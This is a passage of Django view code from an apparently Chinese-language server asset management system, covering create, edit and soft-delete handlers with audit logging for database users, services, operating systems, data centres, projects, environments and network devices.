######################################
class AddDatabaseUserView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
# 判断用户
db_user = DatabaseUserInfo.objects.filter(db_id=int(request.POST.get('db_id'))).filter(
username=request.POST.get('username'))
if db_user:
return HttpResponse('{"status":"failed", "msg":"该用户已存在,请检查!"}', content_type='application/json')
add_db_user_form = AddDatabaseUserForm(request.POST)
if add_db_user_form.is_valid():
db_user = DatabaseUserInfo()
db_user.db_id = int(request.POST.get('db_id'))
db_user.username = request.POST.get('username')
db_user.password = request.POST.get('password')
db_user.grant_login = request.POST.get('grant_login')
db_user.desc = request.POST.get('desc', '')
db_user.add_user = request.user
db_user.update_user = request.user
db_user.status = 1
db_user.save()
for each in request.POST.getlist('dbs'):
db = DatabaseDBInfo.objects.get(id=int(each))
db_user.grant_db.add(db)
db_user.save()
# 添加操作记录
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = db_user.id
op_record.operation = 1
op_record.action = "添加主机 [ %s ] 的数据库用户:%s" % (db_user.db.host.in_ip, db_user.username)
op_record.save()
return HttpResponse('{"status":"success", "msg":"添加成功!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"填写不合法,请检查!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# 编辑数据库用户
######################################
class EditDatabaseUserView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
# 判断用户
db_user = DatabaseUserInfo.objects.get(id=int(request.POST.get('db_user_id')))
new_username = request.POST.get('username')
if db_user.username != new_username:
if DatabaseUserInfo.objects.filter(username=new_username).filter(status=1):
return HttpResponse('{"status":"failed", "msg":"该用户已存在,请检查!"}', content_type='application/json')
edit_db_user_form = EditDatabaseUserForm(request.POST)
if edit_db_user_form.is_valid():
db_user.username = request.POST.get('username')
db_user.password = request.POST.get('password')
db_user.grant_login = request.POST.get('grant_login')
db_user.desc = request.POST.get('desc', '')
db_user.update_user = request.user
db_user.grant_db.clear()
db_user.save()
for each in request.POST.getlist('dbs'):
db = DatabaseDBInfo.objects.get(id=int(each))
db_user.grant_db.add(db)
db_user.save()
# 添加操作记录
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = db_user.id
op_record.operation = 2
op_record.action = "修改主机 [ %s ] 的数据库用户:%s" % (db_user.db.host.in_ip, db_user.username)
op_record.save()
return HttpResponse('{"status":"success", "msg":"修改成功!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"填写不合法,请检查!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# 删除数据库用户
######################################
class DeleteDatabaseUserView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
# 判断用户
db_user = DatabaseUserInfo.objects.get(id=int(request.POST.get('db_user_id')))
db_user.status = 0
db_user.update_user = request.user
db_user.save()
# 添加操作记录
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = db_user.id
op_record.operation = 4
op_record.action = "停用主机 [ %s ] 的数据库用户:%s" % (db_user.db.host.in_ip, db_user.username)
op_record.save()
return HttpResponse('{"status":"success", "msg":"删除成功!"}', content_type='application/json')
else:
return HttpResponse(status=403)
##############################################################################
# 基础配置模块
##############################################################################
######################################
# 添加系统服务
######################################
class AddHostServiceView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
add_service_form = AddHostServiceForm(request.POST)
if add_service_form.is_valid():
service = HostServiceInfo()
host = int(request.POST.get('host_id'))
service.host_id = host
service.name = request.POST.get('name')
service.version = request.POST.get('version')
service.listen_user = request.POST.get('listen_user')
service.listen_port = request.POST.get('listen_port')
service.ins_path = request.POST.get('ins_path')
service.log_path = request.POST.get('log_path')
service.backup_path = request.POST.get('backup_path', '')
service.start_cmd = request.POST.get('start_cmd')
service.desc = request.POST.get('desc', '')
service.add_user = request.user
service.update_user = request.user
service.status = 1
service.save()
# 添加操作记录
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = service.id
op_record.operation = 1
op_record.action = "添加主机 [ %s ] 的服务:%s" % (service.host.in_ip, service.name)
op_record.save()
return HttpResponse('{"status":"success", "msg":"主机服务添加成功!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"主机服务填写不合法,请检查!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# 编辑系统服务
######################################
class EditHostServiceView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
edit_service_form = EditHostServiceForm(request.POST)
if edit_service_form.is_valid():
service = HostServiceInfo.objects.get(id=int(request.POST.get('ser_id')))
service.name = request.POST.get('name')
service.version = request.POST.get('version')
service.listen_user = request.POST.get('listen_user')
service.listen_port = request.POST.get('listen_port')
service.ins_path = request.POST.get('ins_path')
service.log_path = request.POST.get('log_path')
service.backup_path = request.POST.get('backup_path', '')
service.start_cmd = request.POST.get('start_cmd')
service.desc = request.POST.get('desc', '')
service.update_user = request.user
service.save()
# 添加操作记录
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = service.id
op_record.operation = 2
op_record.action = "修改主机 [ %s ] 的服务:%s" % (service.host.in_ip, service.name)
op_record.save()
return HttpResponse('{"status":"success", "msg":"主机服务修改成功!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"主机服务填写不合法,请检查!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# 删除服务
######################################
class DeleteHostServiceView(LoginStatusCheck, View):
def post(self, request):
try:
ser_id = request.POST.get('ser_id')
service = HostServiceInfo.objects.get(id=int(ser_id))
service.update_user = request.user
service.status = 0
service.save()
# 添加操作记录
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = service.id
op_record.operation = 4
op_record.action = "停用主机 [ %s ] 的服务:%s" % (service.host.in_ip, service.name)
op_record.save()
return HttpResponse('{"status":"success", "msg":"服务删除成功!"}', content_type='application/json')
except Exception as e:
return HttpResponse('{"status":"falied", "msg":"服务删除失败!"}', content_type='application/json')
######################################
# 操作系统
######################################
class OSListView(LoginStatusCheck, View):
def get(self, request):
if request.user.role > 1:
# 页面选择
web_chose_left_1 = 'basic_setting'
web_chose_left_2 = 'os'
web_chose_middle = ''
# 获取操作系统
systems = OperatingSystemInfo.objects.filter(status=1).order_by('-update_time')
# 关键字
keyword = request.GET.get('keyword', '')
if keyword != '':
systems = systems.filter(
Q(name__icontains=keyword) | Q(version__icontains=keyword) | Q(desc__icontains=keyword) | Q(
add_user__chinese_name__icontains=keyword) | Q(update_user__chinese_name__icontains=keyword))
# 数量
system_nums = systems.count()
# 判断页码
try:
page = request.GET.get('page', 1)
except PageNotAnInteger:
page = 1
# 对取到的数据进行分页,记得定义每页的数量
p = Paginator(systems, 16, request=request)
# 分页处理后的 QuerySet
systems = p.page(page)
context = {
'web_chose_left_1': web_chose_left_1,
'web_chose_left_2': web_chose_left_2,
'web_chose_middle': web_chose_middle,
'systems': systems,
'keyword': keyword,
'system_nums': system_nums,
}
return render(request, 'host_management/other/system_list.html', context=context)
else:
return HttpResponse(status=403)
######################################
# 添加操作系统
######################################
class AddOSView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
add_os_form = AddOsForm(request.POST)
if add_os_form.is_valid():
# 判断是否有相同的记录
name = request.POST.get('name')
version = request.POST.get('version')
bit = int(request.POST.get('bit'))
check_os = OperatingSystemInfo.objects.filter(name=name).filter(version=version).filter(bit=bit).filter(
status=1)
if check_os:
return HttpResponse('{"status":"failed", "msg":"该记录已经存在,请检查!"}', content_type='application/json')
# 添加记录
os = OperatingSystemInfo()
os.name = name
os.version = version
os.bit = bit
os.desc = request.POST.get('desc', '')
os.add_user = request.user
os.update_user = request.user
os.status = 1
os.save()
# 添加操作记录
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = os.id
op_record.operation = 1
op_record.action = "添加操作系统:%s %s ( %s )" % (os.name, os.version, os.bit)
op_record.save()
return HttpResponse('{"status":"success", "msg":"操作系统添加成功!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"填写不合法,请检查!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# 编辑操作系统
######################################
class EditOSView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
edit_os_form = EditOsForm(request.POST)
if edit_os_form.is_valid():
os = OperatingSystemInfo.objects.get(id=int(request.POST.get('sys_id')))
os.name = request.POST.get('name')
os.version = request.POST.get('version')
os.bit = int(request.POST.get('bit'))
os.desc = request.POST.get('desc', '')
os.update_user = request.user
os.save()
# 添加操作记录
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = os.id
op_record.operation = 2
op_record.action = "修改操作系统:%s %s ( %s )" % (os.name, os.version, os.bit)
op_record.save()
return HttpResponse('{"status":"success", "msg":"操作系统修改成功!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"填写不合法,请检查!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# 删除操作系统
######################################
class DeleteOSView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
os = OperatingSystemInfo.objects.get(id=int(request.POST.get('sys_id')))
os.status = 0
os.update_user = request.user
os.save()
# 添加操作记录
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = os.id
op_record.operation = 4
op_record.action = "停用操作系统:%s %s ( %s )" % (os.name, os.version, os.bit)
op_record.save()
return HttpResponse('{"status":"success", "msg":"操作系统删除成功!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# 机房管理
######################################
class IdcListView(LoginStatusCheck, View):
def get(self, request):
if request.user.role > 1:
# 页面选择
web_chose_left_1 = 'basic_setting'
web_chose_left_2 = 'idc'
web_chose_middle = ''
# 获取操作系统
idcs = IdcInfo.objects.filter(status=1).order_by('-update_time')
# 关键字
keyword = request.GET.get('keyword', '')
if keyword != '':
idcs = idcs.filter(
Q(name__icontains=keyword) | Q(address__icontains=keyword) | Q(desc__icontains=keyword) | Q(
add_user__chinese_name__icontains=keyword) | Q(update_user__chinese_name__icontains=keyword))
# 数量
idc_nums = idcs.count()
# 判断页码
try:
page = request.GET.get('page', 1)
except PageNotAnInteger:
page = 1
# 对取到的数据进行分页,记得定义每页的数量
p = Paginator(idcs, 16, request=request)
# 分页处理后的 QuerySet
idcs = p.page(page)
context = {
'web_chose_left_1': web_chose_left_1,
'web_chose_left_2': web_chose_left_2,
'web_chose_middle': web_chose_middle,
'idcs': idcs,
'keyword': keyword,
'idc_nums': idc_nums,
}
return render(request, 'host_management/other/idc_list.html', context=context)
else:
return HttpResponse(status=403)
######################################
# 添加机房
######################################
class AddIDCView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
add_idc_form = AddIdcForm(request.POST)
if add_idc_form.is_valid():
# 判断是否有相同的记录
name = request.POST.get('name')
address = request.POST.get('address')
check_idc = IdcInfo.objects.filter(name=name).filter(address=address).filter(status=1)
if check_idc:
return HttpResponse('{"status":"failed", "msg":"该记录已经存在,请检查!"}', content_type='application/json')
# 添加记录
idc = IdcInfo()
idc.name = name
idc.address = address
idc.desc = request.POST.get('desc', '')
idc.add_user = request.user
idc.update_user = request.user
idc.status = 1
idc.save()
# 添加操作记录
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = idc.id
op_record.operation = 1
op_record.action = "添加机房:%s" % (idc.name)
op_record.save()
return HttpResponse('{"status":"success", "msg":"机房添加成功!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"填写不合法,请检查!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# 编辑机房
######################################
class EditIDCView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
edit_idc_form = EditIdcForm(request.POST)
if edit_idc_form.is_valid():
idc = IdcInfo.objects.get(id=int(request.POST.get('idc_id')))
idc.name = request.POST.get('name')
idc.address = request.POST.get('address')
idc.desc = request.POST.get('desc', '')
idc.update_user = request.user
idc.save()
# 添加操作记录
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = idc.id
op_record.operation = 2
op_record.action = "修改机房:%s" % (idc.name)
op_record.save()
return HttpResponse('{"status":"success", "msg":"机房修改成功!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"填写不合法,请检查!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# 删除机房
######################################
class DeleteIDCView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
idc = IdcInfo.objects.get(id=int(request.POST.get('idc_id')))
idc.status = 0
idc.update_user = request.user
idc.save()
# 添加操作记录
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = idc.id
op_record.operation = 4
op_record.action = "停用机房:%s" % (idc.name)
op_record.save()
return HttpResponse('{"status":"success", "msg":"机房删除成功!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# 项目管理
######################################
class ProjectListView(LoginStatusCheck, View):
def get(self, request):
if request.user.role > 1:
# 页面选择
web_chose_left_1 = 'basic_setting'
web_chose_left_2 = 'project'
web_chose_middle = ''
# 人员
users = UserProfile.objects.filter(status=1)
# 获取操作系统
projects = ProjectInfo.objects.filter(status=1).order_by('-update_time')
# 关键字
keyword = request.GET.get('keyword', '')
if keyword != '':
projects = projects.filter(
Q(name__icontains=keyword) | Q(run_env__icontains=keyword) | Q(pro_user__icontains=keyword) | Q(
add_user__chinese_name__icontains=keyword) | Q(
update_user__chinese_name__icontains=keyword) | Q(op_user__chinese_name__icontains=keyword))
# 数量
project_nums = projects.count()
# 判断页码
try:
page = request.GET.get('page', 1)
except PageNotAnInteger:
page = 1
# 对取到的数据进行分页,记得定义每页的数量
p = Paginator(projects, 16, request=request)
# 分页处理后的 QuerySet
projects = p.page(page)
context = {
'web_chose_left_1': web_chose_left_1,
'web_chose_left_2': web_chose_left_2,
'web_chose_middle': web_chose_middle,
'users': users,
'projects': projects,
'keyword': keyword,
'project_nums': project_nums,
}
return render(request, 'host_management/other/project_list.html', context=context)
else:
return HttpResponse(status=403)
######################################
# 添加项目
######################################
class AddProjectView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
add_project_form = AddProjectForm(request.POST)
if add_project_form.is_valid():
# 判断是否有相同的记录
name = request.POST.get('name')
check_pro = ProjectInfo.objects.filter(name=name).filter(status=1)
if check_pro:
return HttpResponse('{"status":"failed", "msg":"该记录已经存在,请检查!"}', content_type='application/json')
# 添加记录
pro = ProjectInfo()
pro.name = name
pro.pro_user = request.POST.get('pro_user')
pro.op_user_id = int(request.POST.get('op_user'))
pro.run_env = request.POST.get('run_env')
pro.add_user = request.user
pro.update_user = request.user
pro.status = 1
pro.save()
# 添加操作记录
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = pro.id
op_record.operation = 1
op_record.action = "添加项目:%s" % (pro.name)
op_record.save()
return HttpResponse('{"status":"success", "msg":"项目添加成功!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"填写不合法,请检查!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# 编辑项目
######################################
class EditProjectView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
edit_project_form = EditProjectForm(request.POST)
if edit_project_form.is_valid():
pro = ProjectInfo.objects.get(id=int(request.POST.get('pro_id')))
pro.name = request.POST.get('name')
pro.pro_user = request.POST.get('pro_user')
pro.op_user_id = int(request.POST.get('op_user'))
pro.run_env = request.POST.get('run_env')
pro.update_user = request.user
pro.save()
# 添加操作记录
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = pro.id
op_record.operation = 2
op_record.action = "修改项目:%s" % (pro.name)
op_record.save()
return HttpResponse('{"status":"success", "msg":"项目修改成功!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"填写不合法,请检查!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# 删除项目
######################################
class DeleteProjectView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
pro = ProjectInfo.objects.get(id=int(request.POST.get('pro_id')))
pro.status = 0
pro.update_user = request.user
pro.save()
# 添加操作记录
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = pro.id
op_record.operation = 4
op_record.action = "停用项目:%s" % (pro.name)
op_record.save()
return HttpResponse('{"status":"success", "msg":"项目删除成功!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# 环境管理
######################################
class OpEnvListView(LoginStatusCheck, View):
def get(self, request):
if request.user.role > 1:
# 页面选择
web_chose_left_1 = 'basic_setting'
web_chose_left_2 = 'env'
web_chose_middle = ''
# 获取环境
openvs = OperatingEnvironmentInfo.objects.filter(status=1).order_by('-update_time')
# 关键字
keyword = request.GET.get('keyword', '')
if keyword != '':
openvs = openvs.filter(
Q(name__icontains=keyword) | Q(desc__icontains=keyword) | Q(
add_user__chinese_name__icontains=keyword) | Q(
update_user__chinese_name__icontains=keyword))
# 数量
openv_nums = openvs.count()
# 判断页码
try:
page = request.GET.get('page', 1)
except PageNotAnInteger:
page = 1
# 对取到的数据进行分页,记得定义每页的数量
p = Paginator(openvs, 16, request=request)
# 分页处理后的 QuerySet
openvs = p.page(page)
context = {
'web_chose_left_1': web_chose_left_1,
'web_chose_left_2': web_chose_left_2,
'web_chose_middle': web_chose_middle,
'openvs': openvs,
'keyword': keyword,
'openv_nums': openv_nums,
}
return render(request, 'host_management/other/openv_list.html', context=context)
else:
return HttpResponse(status=403)
######################################
# 添加环境
######################################
class AddOpEnvView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
add_openv_form = AddOpEnvForm(request.POST)
if add_openv_form.is_valid():
# 判断是否有相同的记录
name = request.POST.get('name')
check_openv = OperatingEnvironmentInfo.objects.filter(name=name).filter(status=1)
if check_openv:
return HttpResponse('{"status":"failed", "msg":"该记录已经存在,请检查!"}', content_type='application/json')
# 添加记录
openv = OperatingEnvironmentInfo()
openv.name = name
openv.desc = request.POST.get('desc', '')
openv.add_user = request.user
openv.update_user = request.user
openv.status = 1
openv.save()
# 添加操作记录
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = openv.id
op_record.operation = 1
op_record.action = "添加环境:%s" % (openv.name)
op_record.save()
return HttpResponse('{"status":"success", "msg":"环境添加成功!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"填写不合法,请检查!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# 编辑环境
######################################
class EditOpEnvView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
edit_openv_form = EditOpEnvForm(request.POST)
if edit_openv_form.is_valid():
openv = OperatingEnvironmentInfo.objects.get(id=int(request.POST.get('env_id')))
openv.name = request.POST.get('name')
openv.desc = request.POST.get('desc', '')
openv.update_user = request.user
openv.save()
# 添加操作记录
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = openv.id
op_record.operation = 2
op_record.action = "修改环境:%s" % (openv.name)
op_record.save()
return HttpResponse('{"status":"success", "msg":"环境修改成功!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"填写不合法,请检查!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# 删除环境
######################################
class DeleteOpEnvView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
openv = OperatingEnvironmentInfo.objects.get(id=int(request.POST.get('env_id')))
openv.status = 0
openv.update_user = request.user
openv.save()
# 添加操作记录
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = openv.id
op_record.operation = 4
op_record.action = "停用环境:%s" % (openv.name)
op_record.save()
return HttpResponse('{"status":"success", "msg":"环境删除成功!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# 用途管理
######################################
class UseListView(LoginStatusCheck, View):
def get(self, request):
if request.user.role > 1:
# 页面选择
web_chose_left_1 = 'basic_setting'
web_chose_left_2 = 'use'
web_chose_middle = ''
# 获取环境
uses = UseInfo.objects.filter(status=1).order_by('-update_time')
# 关键字
keyword = request.GET.get('keyword', '')
if keyword != '':
uses = uses.filter(
Q(name__icontains=keyword) | Q(desc__icontains=keyword) | Q(
add_user__chinese_name__icontains=keyword) | Q(
update_user__chinese_name__icontains=keyword))
# 数量
use_nums = uses.count()
# 判断页码
try:
page = request.GET.get('page', 1)
except PageNotAnInteger:
page = 1
# 对取到的数据进行分页,记得定义每页的数量
p = Paginator(uses, 16, request=request)
# 分页处理后的 QuerySet
uses = p.page(page)
context = {
'web_chose_left_1': web_chose_left_1,
'web_chose_left_2': web_chose_left_2,
'web_chose_middle': web_chose_middle,
'uses': uses,
'keyword': keyword,
'use_nums': use_nums,
}
return render(request, 'host_management/other/use_list.html', context=context)
else:
return HttpResponse(status=403)
######################################
# 添加用途
######################################
class AddUseView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
add_use_form = AddUseForm(request.POST)
if add_use_form.is_valid():
# 判断是否有相同的记录
name = request.POST.get('name')
check_use = UseInfo.objects.filter(name=name).filter(status=1)
if check_use:
return HttpResponse('{"status":"failed", "msg":"该记录已经存在,请检查!"}', content_type='application/json')
# 添加记录
use = UseInfo()
use.name = name
use.desc = request.POST.get('desc', '')
use.add_user = request.user
use.update_user = request.user
use.status = 1
use.save()
# 添加操作记录
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = use.id
op_record.operation = 1
op_record.action = "添加用途:%s" % (use.name)
op_record.save()
return HttpResponse('{"status":"success", "msg":"用途添加成功!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"填写不合法,请检查!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# 编辑用途
######################################
class EditUseView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
edit_use_form = EditUseForm(request.POST)
if edit_use_form.is_valid():
use = UseInfo.objects.get(id=int(request.POST.get('use_id')))
use.name = request.POST.get('name')
use.desc = request.POST.get('desc', '')
use.update_user = request.user
use.save()
# 添加操作记录
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = use.id
op_record.operation = 2
op_record.action = "修改用途:%s" % (use.name)
op_record.save()
return HttpResponse('{"status":"success", "msg":"用途修改成功!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"填写不合法,请检查!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# 删除用途
######################################
class DeleteUseView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
use = UseInfo.objects.get(id=int(request.POST.get('use_id')))
use.status = 0
use.update_user = request.user
use.save()
# 添加操作记录
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = use.id
op_record.operation = 4
op_record.action = "停用用途:%s" % (use.name)
op_record.save()
return HttpResponse('{"status":"success", "msg":"用途删除成功!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# 主机操作记录
######################################
class HostOperationView(LoginStatusCheck, View):
def get(self, request):
if request.user.role > 1:
# 页面选择
web_chose_left_1 = 'log_management'
web_chose_left_2 = 'op_log'
web_chose_middle = ''
records = UserOperationRecord.objects.filter(belong=1).order_by('-add_time')
# 关键字
keyword = request.GET.get('keyword', '')
if keyword != '':
records = records.filter(
Q(op_user__chinese_name=keyword) | Q(action__icontains=keyword))
# 用户选择
user_check = request.GET.get('user_check', 'all')
# 添加
if user_check == 'add':
records = records.filter(operation=1)
# 修改
if user_check == 'edit':
records = records.filter(operation=2)
# 启用
if user_check == 'up':
records = records.filter(operation=3)
# 停用
if user_check == 'down':
records = records.filter(operation=4)
# 数量
record_nums = records.count()
# 判断页码
try:
page = request.GET.get('page', 1)
except PageNotAnInteger:
page = 1
# 对取到的数据进行分页,记得定义每页的数量
p = Paginator(records, 19, request=request)
# 分页处理后的 QuerySet
records = p.page(page)
context = {
'web_chose_left_1': web_chose_left_1,
'web_chose_left_2': web_chose_left_2,
'web_chose_middle': web_chose_middle,
'records': records,
'keyword': keyword,
'record_nums': record_nums,
'user_check': user_check,
}
return render(request, 'host_management/other/host_op_record.html', context=context)
else:
return HttpResponse(status=403)
##############################################################################
# 网络资产模块
##############################################################################
######################################
# 网络设备列表
######################################
class NetworkDviceListView(LoginStatusCheck, View):
def get(self, request):
if request.user.role > 1:
# 页面选择
web_chose_left_1 = 'host_management'
web_chose_left_2 = 'net_dvice'
web_chose_middle = ''
records = NetworkDviceInfo.objects.filter(status=1).order_by('-update_time')
# 关键字
keyword = request.GET.get('keyword', '')
if keyword != '':
records = records.filter(
Q(category__icontains=keyword) | Q(name__icontains=keyword) | Q(desc__icontains=keyword))
# 数量
record_nums = records.count()
# 判断页码
try:
page = request.GET.get('page', 1)
except PageNotAnInteger:
page = 1
# 对取到的数据进行分页,记得定义每页的数量
p = Paginator(records, 16, request=request)
# 分页处理后的 QuerySet
records = p.page(page)
context = {
'web_chose_left_1': web_chose_left_1,
'web_chose_left_2': web_chose_left_2,
'web_chose_middle': web_chose_middle,
'records': records,
'keyword': keyword,
'record_nums': record_nums,
}
return render(request, 'host_management/port/network_dvice_list.html', context=context)
else:
return HttpResponse(status=403)
######################################
# 添加网络设备
######################################
class AddNetworkDviceView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
name = request.POST.get('name')
ip_in = request.POST.get('ip_in')
if NetworkDviceInfo.objects.filter(name=name).filter(ip_in=ip_in).filter(status=1):
return HttpResponse('{"status":"failed", "msg":"该记录已存在,请检查!"}', content_type='application/json')
add_net_dvice_form = AddNetDviceForm(request.POST)
if add_net_dvice_form.is_valid():
net_dvice = NetworkDviceInfo()
net_dvice.category = request.POST.get('name')
net_dvice.name = name
net_dvice.ip_in = request.POST.get('ip_in')
net_dvice.ip_out = request.POST.get('ip_out', '')
net_dvice.address = request.POST.get('address')
net_dvice.admin_user = request.POST.get('admin_user')
net_dvice.admin_pass = request.POST.get('admin_pass')
net_dvice.desc = request.POST.get('desc', '')
net_dvice.add_user = request.user
net_dvice.update_user = request.user
net_dvice.status = 1
net_dvice.save()
# 添加操作记录
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = net_dvice.id
op_record.operation = 1
op_record.action = "添加网络设备:%s [ %s ]" % (net_dvice.name, net_dvice.ip_in)
op_record.save()
return HttpResponse('{"status":"success", "msg":"添加设备成功!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"填写不合法,请检查!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# 编辑网络设备
######################################
class EditNetworkDviceView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
net_dvice = NetworkDviceInfo.objects.get(id=int(request.POST.get('dv_id')))
name = request.POST.get('name')
ip_in = request.POST.get('ip_in')
# 判断记录是否存在
if net_dvice.name != name:
if NetworkDviceInfo.objects.filter(name=name).filter(ip_in=ip_in).filter(status=1):
return HttpResponse('{"status":"failed", "msg":"该记录已存在,请检查!"}', content_type='application/json')
edit_net_dvice_form = EditNetDviceForm(request.POST)
if edit_net_dvice_form.is_valid():
net_dvice.category = request.POST.get('name')
net_dvice.name = name
net_dvice.ip_in = request.POST.get('ip_in')
net_dvice.ip_out = request.POST.get('ip_out', '')
net_dvice.address = request.POST.get('address')
net_dvice.admin_user = request.POST.get('admin_user')
net_dvice.admin_pass = request.POST.get('admin_pass')
net_dvice.desc = request.POST.get('desc', '')
net_dvice.update_user = request.user
net_dvice.save()
# 添加操作记录
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = net_dvice.id
op_record.operation = 2
op_record.action = "修改网络设备:%s [ %s ]" % (net_dvice.name, net_dvice.ip_in)
op_record.save()
return HttpResponse('{"status":"success", "msg":"修改设备成功!"}', content_type='application/json')
else:
return HttpResponse('{"status":"failed", "msg":"填写不合法,请检查!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# 删除设备
######################################
class DeleteNetworkDviceView(LoginStatusCheck, View):
def post(self, request):
if request.user.role > 1:
net_dvice = NetworkDviceInfo.objects.get(id=int(request.POST.get('dv_id')))
net_dvice.status = 0
net_dvice.update_user = request.user
net_dvice.save()
# 添加操作记录
op_record = UserOperationRecord()
op_record.op_user = request.user
op_record.belong = 1
op_record.status = 1
op_record.op_num = net_dvice.id
op_record.operation = 4
op_record.action = "停用网络设备:%s [ %s ]" % (net_dvice.name, net_dvice.ip_in)
op_record.save()
return HttpResponse('{"status":"success", "msg":"设备删除成功!"}', content_type='application/json')
else:
return HttpResponse(status=403)
######################################
# 端口映射列表
######################################
class PortToPortListView(LoginStatusCheck, View):
def get(self, request):
if request.user.role > 1:
# 页面选择
web_chose_left_1 = 'port_domain'
web_chose_left_2 = 'port_port'
web_chose_middle = ''
records = PortToPortInfo.objects.filter(status=1).order_by('-update_time')
# 关键字
keyword = request.GET.get('keyword', '')
if keyword != '':
records = records.filter(
Q(ip_in=keyword) | Q(port_in=keyword) | Q(ip_out=keyword) | Q(port_out=keyword) | Q(
use__icontains=keyword) | Q(desc__icontains=keyword))
# 数量
record_nums = records.count()
# 判断页码
try:
page = request.GET.get('page', 1)
except PageNotAnInteger:
